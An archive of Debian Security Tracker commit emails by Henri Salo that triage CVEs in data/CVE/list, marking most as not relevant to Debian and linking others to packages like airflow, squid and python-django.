from:"Henri Salo"

[Git][security-tracker-team/security-tracker][master] CVE-2024-29733/airflow

2024-04-19 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f9f2b30e by Henri Salo at 2024-04-19T13:30:54+03:00
CVE-2024-29733/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -6187,6 +6187,8 @@ CVE-2024-2322 (The WooCommerce Cart Abandonment Recovery 
WordPress plugin before
NOT-FOR-US: WordPress plugin
 CVE-2024-29734 (Uncontrolled search path element issue exists in SonicDICOM 
Media View ...)
NOT-FOR-US: SonicDICOM Media Viewer
+CVE-2024-29733
+   - airflow  (bug #819700)
 CVE-2024-29434 (An issue in the system image upload interface of Alldata 
v0.4.6 allows ...)
NOT-FOR-US: Alldata
 CVE-2024-29432 (Alldata v0.4.6 was discovered to contain a SQL injection 
vulnerability ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f9f2b30ed5f65fb6d6822345a78b8a11e18c2892

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f9f2b30ed5f65fb6d6822345a78b8a11e18c2892
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2024-04-19 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
68a78d8d by Henri Salo at 2024-04-19T13:10:42+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1942,6 +1942,8 @@ CVE-2024-29219 (Out-of-bounds read vulnerability exists 
in KV STUDIO Ver.11.64 a
NOT-FOR-US: KEYENCE KV STUDIO
 CVE-2024-29218 (Out-of-bounds write vulnerability exists in KV STUDIO 
Ver.11.64 and ea ...)
NOT-FOR-US: KEYENCE KV STUDIO
+CVE-2024-29217
+   NOT-FOR-US: Apache Answer
 CVE-2024-28957 (Generation of predictable identifiers issue exists in Cente 
middleware ...)
NOT-FOR-US: Cente
 CVE-2024-28894 (Out-of-bounds read vulnerability caused by improper checking 
of the op ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/68a78d8d7f1dae39c7df5cc3bd4714fc27bbd9ff

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/68a78d8d7f1dae39c7df5cc3bd4714fc27bbd9ff
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] foswiki CVE-2023-33756, CVE-2023-24698

2023-08-07 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
13164030 by Henri Salo at 2023-08-07T15:38:09+03:00
foswiki CVE-2023-33756, CVE-2023-24698

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -7823,6 +7823,8 @@ CVE-2023-33960 (OpenProject is web-based project 
management software. For any Op
NOT-FOR-US: OpenProject
 CVE-2023-33764 (eMedia Consulting simpleRedak up to v2.47.23.05 was discovered 
to cont ...)
NOT-FOR-US: eMedia Consulting simpleRedak
+CVE-2023-33756
+   - foswiki  (bug #509864)
 CVE-2023-33754 (The captive portal in Inpiazza Cloud WiFi versions prior to 
v4.2.17 do ...)
NOT-FOR-US: Inpiazza Cloud WiFi
 CVE-2023-33552 (Heap Buffer Overflow in the erofs_read_one_data function at 
data.c in  ...)
@@ -30589,6 +30591,7 @@ CVE-2023-24699
RESERVED
 CVE-2023-24698
RESERVED
+   - foswiki  (bug #509864)
 CVE-2023-24697
RESERVED
 CVE-2023-24696



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/13164030f7338bdcbe9a8afa97eebe736a833cbe

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/13164030f7338bdcbe9a8afa97eebe736a833cbe
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU CVE-2023-36542

2023-07-29 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
aae19c90 by Henri Salo at 2023-07-29T10:58:22+03:00
NFU CVE-2023-36542

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2575,6 +2575,8 @@ CVE-2022-48521 (An issue was discovered in OpenDKIM 
through 2.10.3, and 2.11.x t
NOTE: https://github.com/trusteddomainproject/OpenDKIM/issues/148
 CVE-2023-36543 (Apache Airflow, versions before 2.6.3, has a vulnerability 
where an au ...)
- airflow  (bug #819700)
+CVE-2023-36542
+   NOT-FOR-US: Apache NiFi
 CVE-2023-35908 (Apache Airflow, versions before 2.6.3, is affected by a 
vulnerability  ...)
- airflow  (bug #819700)
 CVE-2023-3608 (A vulnerability was found in Ruijie BCR810W 2.5.10. It has been 
rated  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/aae19c902f0b14dce105828c1605257d42e5d1d9

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/aae19c902f0b14dce105828c1605257d42e5d1d9
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU CVE-2023-38647

2023-07-25 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
edfb6a00 by Henri Salo at 2023-07-25T20:53:00+03:00
NFU CVE-2023-38647

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -214,6 +214,8 @@ CVE-2023-3819 (Exposure of Sensitive Information to an 
Unauthorized Actor in Git
NOT-FOR-US: pimcore
 CVE-2023-3102 (A sensitive information leak issue has been discovered in 
GitLab EE af ...)
- gitlab  (Specific to EE)
+CVE-2023-38647
+   NOT-FOR-US: Apache Helix
 CVE-2023-38646 (Metabase open source before 0.46.6.1 and Metabase Enterprise 
before 1. ...)
NOT-FOR-US: Metabase
 CVE-2023-38187 (Microsoft Edge (Chromium-based) Elevation of Privilege 
Vulnerability)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/edfb6a00925b8c18a55653454380eca9dac106e6

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/edfb6a00925b8c18a55653454380eca9dac106e6
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2023-34478/shiro

2023-07-24 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
eaffaf86 by Henri Salo at 2023-07-24T21:13:16+03:00
CVE-2023-34478/shiro

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -297,6 +297,10 @@ CVE-2023-36853 (In Keysight Geolocation Server v2.4.2 and 
prior, a low privilege
NOT-FOR-US: Keysight Geolocation Server
 CVE-2023-35134 (Weintek Weincloud v0.13.6   could allow an attacker to reset a 
passwor ...)
NOT-FOR-US: Weincloud
+CVE-2023-34478
+   - shiro 
+   NOTE: https://www.openwall.com/lists/oss-security/2023/07/24/4
+   TODO: check
 CVE-2023-34429 (Weintek Weincloud v0.13.6 could allow an attacker to cause 
a denia ...)
NOT-FOR-US: Weincloud
 CVE-2023-34394 (In Keysight Geolocation Server v2.4.2 and prior, an attacker 
could upl ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/eaffaf86dd5f0068447bc1a3d55ee33ae6ec646d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/eaffaf86dd5f0068447bc1a3d55ee33ae6ec646d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2023-03-15 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
af8e549f by Henri Salo at 2023-03-15T13:11:59+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -5806,7 +5806,7 @@ CVE-2023-26264
 CVE-2023-26263
RESERVED
 CVE-2023-26262 (An issue was discovered in Sitecore XP/XM 10.3. As an 
authenticated Si ...)
-   TODO: check
+   NOT-FOR-US: Sitecore
 CVE-2023-26261 (In UBIKA WAAP Gateway/Cloud through 6.10, a blind XPath 
injection lead ...)
NOT-FOR-US: UBIKA WAAP Gateway/Cloud
 CVE-2023-26260



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/af8e549f29cd79e0b8a7332dfbec232101c349a5

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/af8e549f29cd79e0b8a7332dfbec232101c349a5
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2023-02-23 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
c5de1b01 by Henri Salo at 2023-02-23T11:51:28+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2442,6 +2442,7 @@ CVE-2023-25622
RESERVED
 CVE-2023-25621
RESERVED
+   NOT-FOR-US: Apache Sling
 CVE-2023-25620
RESERVED
 CVE-2023-25619



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/c5de1b012cdb26294b09b19792a86c43f701fd45

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/c5de1b012cdb26294b09b19792a86c43f701fd45
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2023-24580/python-django

2023-02-14 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
35d1ce86 by Henri Salo at 2023-02-14T11:03:45+02:00
CVE-2023-24580/python-django

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3229,6 +3229,9 @@ CVE-2023-0526
RESERVED
 CVE-2023-24580
RESERVED
+   - python-django 
+   TODO: check
+   NOTE: 
https://www.djangoproject.com/weblog/2023/feb/14/security-releases/
 CVE-2023-24579
RESERVED
 CVE-2023-24578



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/35d1ce8677baf886c11f3a452f6321a27131975d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/35d1ce8677baf886c11f3a452f6321a27131975d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2023-02-04 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
e3109616 by Henri Salo at 2023-02-04T11:07:20+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -6602,6 +6602,7 @@ CVE-2013-10009 (A vulnerability was found in DrAzraelTod 
pyChao and classified a
NOT-FOR-US: DrAzraelTod pyChao
 CVE-2023-22849
RESERVED
+   NOT-FOR-US: Apache Sling
 CVE-2023-0114 (A vulnerability was found in Netis Netcore Router. It has been 
rated a ...)
NOT-FOR-US: Netis Netcore Router
 CVE-2023-0113 (A vulnerability was found in Netis Netcore Router up to 2.2.6. 
It has  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/e310961624138610c9a7a3fc1aedf9bfcb99656d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/e310961624138610c9a7a3fc1aedf9bfcb99656d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-26068/pistache

2023-02-02 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7f8e69f4 by Henri Salo at 2023-02-03T05:48:54+02:00
CVE-2022-26068/pistache

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -74458,7 +74458,8 @@ CVE-2022-0759 (A flaw was found in all versions of 
kubeclient up to (but not inc
 CVE-2022-26085 (An OS command injection vulnerability exists in the httpd 
wlscan_ASP f ...)
NOT-FOR-US: InHand Networks InRouter302
 CVE-2022-26068 (This affects the package pistacheio/pistache before 
0.0.3.20220425. It ...)
-   - pistache  (bug #929593)
+   - pistache 
+   TODO: check
 CVE-2022-26066
RESERVED
 CVE-2022-26063



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7f8e69f4e07496dda9a4b4f12221517665ca5f13

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7f8e69f4e07496dda9a4b4f12221517665ca5f13
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2023-02-01 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
891c57d1 by Henri Salo at 2023-02-01T12:44:45+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,3 +1,6 @@
+CVE-2023-24997
+   RESERVED
+   NOT-FOR-US: Apache InLong
 CVE-2023-24977
RESERVED
NOT-FOR-US: Apache InLong



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/891c57d120814dc9d8113687413b010413a7aaee

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/891c57d120814dc9d8113687413b010413a7aaee
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2023-02-01 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
a13e905a by Henri Salo at 2023-02-01T10:13:41+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,5 +1,6 @@
 CVE-2023-24977
RESERVED
+   NOT-FOR-US: Apache InLong
 CVE-2023-24976
RESERVED
 CVE-2023-24975



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a13e905a632f8dda74b274c0d86fd5e868ea5d97

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a13e905a632f8dda74b274c0d86fd5e868ea5d97
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2023-01-05 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
52718548 by Henri Salo at 2023-01-06T09:38:17+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -9098,6 +9098,7 @@ CVE-2022-4146
RESERVED
 CVE-2022-45935
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2022-45934 (An issue was discovered in the Linux kernel through 6.0.10. 
l2cap_conf ...)
- linux 
NOTE: 
https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=ae4569813a6e931258db627cdfe50dfb4f917d5d
@@ -9506,6 +9507,7 @@ CVE-2022-45788
RESERVED
 CVE-2022-45787
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2022-45786
RESERVED
 CVE-2022-4121 [Null pointer dereference in mailimap_mailbox_data_status_free 
in low-level/imap/mailimap_types.c]



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/527185484998c90bf431880b9461961e177df804

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/527185484998c90bf431880b9461961e177df804
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-12-30 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d02f76c4 by Henri Salo at 2022-12-30T13:18:57+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -13178,6 +13178,7 @@ CVE-2022-44622 (In JetBrains TeamCity version between 
2021.2 and 2022.10 access
NOT-FOR-US: JetBrains TeamCity
 CVE-2022-44621
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2022-44618
RESERVED
 CVE-2022-44614
@@ -18198,6 +18199,7 @@ CVE-2022-43397 (A vulnerability has been identified in 
Parasolid V34.0 (All vers
NOT-FOR-US: Siemens
 CVE-2022-43396
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2022-3591 (Use After Free in GitHub repository vim/vim prior to 9.0.0789. 
...)
- vim 2:9.0.0813-1 (unimportant)
NOTE: https://huntr.dev/bounties/a5a998c2-4b07-47a7-91be-dbc1886b3921



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d02f76c44a2f42e124d2f75fab4f76dcf3c56fe4

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d02f76c44a2f42e124d2f75fab4f76dcf3c56fe4
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-12-02 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7b901fee by Henri Salo at 2022-12-03T08:12:15+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -912,7 +912,7 @@ CVE-2022-46146 (Prometheus Exporter Toolkit is a utility 
package to build export
NOTE: 
https://github.com/prometheus/exporter-toolkit/security/advisories/GHSA-7rg2-cxvp-9p7p
NOTE: 
https://github.com/prometheus/exporter-toolkit/commit/5b1eab34484ddd353986bce736cd119d863e4ff5
 (v0.8.2)
 CVE-2022-46145 (authentik is an open-source identity provider. Versions prior 
to 2022. ...)
-   TODO: check
+   NOT-FOR-US: authentik
 CVE-2022-46144
RESERVED
 CVE-2022-46143



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7b901fee2939a3109bbbe7576d559bf546ee9f6d

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7b901fee2939a3109bbbe7576d559bf546ee9f6d
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] Fix typo

2022-10-27 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
3fbfc044 by Henri Salo at 2022-10-28T08:55:36+03:00
Fix typo

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1669,7 +1669,7 @@ CVE-2022-43761
RESERVED
 CVE-2022-3705 (A vulnerability was found in vim and classified as problematic. 
Affect ...)
- vim 
-   NOTE: 
ttps://github.com/vim/vim/commit/d0fab10ed2a86698937e3c3fed2f10bd9bb5e731 
(v9.0.0805)
+   NOTE: 
https://github.com/vim/vim/commit/d0fab10ed2a86698937e3c3fed2f10bd9bb5e731 
(v9.0.0805)
 CVE-2022-3704 (A vulnerability classified as problematic has been found in 
Ruby on Ra ...)
- rails 
NOTE: 
https://github.com/rails/rails/commit/be177e4566747b73ff63fd5f529fab564e475ed4



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3fbfc0446da5a4517f6461a9e81fdde0bb13c59b

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3fbfc0446da5a4517f6461a9e81fdde0bb13c59b
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-41672/airflow

2022-10-04 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
15f2defb by Henri Salo at 2022-10-04T22:18:47+03:00
CVE-2022-41672/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1656,6 +1656,7 @@ CVE-2022-41673
RESERVED
 CVE-2022-41672
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-41671
RESERVED
 CVE-2022-41670



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/15f2defbde0e35afb32d3aadb156b597e23a5247

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/15f2defbde0e35afb32d3aadb156b597e23a5247
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-41317 and CVE-2022-41318 squid

2022-09-23 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
89090afc by Henri Salo at 2022-09-23T09:37:32+03:00
CVE-2022-41317 and CVE-2022-41318 squid

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -20,6 +20,16 @@ CVE-2022-3267 (Cross-Site Request Forgery (CSRF) in GitHub 
repository ikus060/rd
- rdiffweb  (bug #969974)
 CVE-2022-3266
RESERVED
+CVE-2022-41318
+   - squid 
+   - squid3 
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/09/23/2
+CVE-2022-41317
+   - squid 
+   - squid3 
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/09/23/1
 CVE-2022-41313
RESERVED
 CVE-2022-41312



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/89090afc119770a3b381a30dace75588b8b09f47

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/89090afc119770a3b381a30dace75588b8b09f47
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-09-11 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
398135e8 by Henri Salo at 2022-09-11T12:21:13+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2605,6 +2605,7 @@ CVE-2022-39136
RESERVED
 CVE-2022-39135
RESERVED
+   NOT-FOR-US: Apache Calcite
 CVE-2022-39134
RESERVED
 CVE-2022-39133



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/398135e89207ea51a4d372d9d8e4bfa0ab6cfbc4

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/398135e89207ea51a4d372d9d8e4bfa0ab6cfbc4
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-38054/airflow

2022-09-02 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7581d34c by Henri Salo at 2022-09-02T09:49:19+03:00
CVE-2022-38054/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3176,6 +3176,7 @@ CVE-2022-38058
RESERVED
 CVE-2022-38054
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-37412
RESERVED
 CVE-2022-37411



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7581d34cd072905a6c43584dd3c51fc13c3efb6c

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7581d34cd072905a6c43584dd3c51fc13c3efb6c
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU CVE-2022-34916 Apache Flume

2022-08-20 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
5964ae24 by Henri Salo at 2022-08-21T02:24:21+03:00
NFU CVE-2022-34916 Apache Flume

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -8978,6 +8978,7 @@ CVE-2022-34917
RESERVED
 CVE-2022-34916
RESERVED
+   NOT-FOR-US: Apache Flume
 CVE-2022-2306 (Old session tokens can be used to authenticate to the 
application and  ...)
NOT-FOR-US: Nakama
 CVE-2022-2305 (The WordPress Popup WordPress plugin through 1.9.3.8 does not 
sanitise ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/5964ae24ae828da23329a544a0ef9e8b91ed0d21

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/5964ae24ae828da23329a544a0ef9e8b91ed0d21
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] CVE-2022-38362/airflow

2022-08-16 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8f89a0e0 by Henri Salo at 2022-08-16T22:09:06+03:00
CVE-2022-38362/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -20,6 +20,7 @@ CVE-2022-2826
RESERVED
 CVE-2022-38362
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-38361
RESERVED
 CVE-2022-38360



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8f89a0e0a31dc86dcf461818b81ecf92557c88b2

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8f89a0e0a31dc86dcf461818b81ecf92557c88b2
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits

[Git][security-tracker-team/security-tracker][master] NFU

2022-08-13 Thread Henri Salo (@hsalo-guest)



Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8e48f103 by Henri Salo at 2022-08-13T09:38:37+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1844,8 +1844,10 @@ CVE-2022-37413
RESERVED
 CVE-2022-37401
RESERVED
+   NOT-FOR-US: Apache OpenOffice
 CVE-2022-37400
RESERVED
+   NOT-FOR-US: Apache OpenOffice
 CVE-2022-37399
RESERVED
 CVE-2022-37398 (A stack-based buffer overflow vulnerability was found inside 
ADM when  ...)



View it on GitLab: 
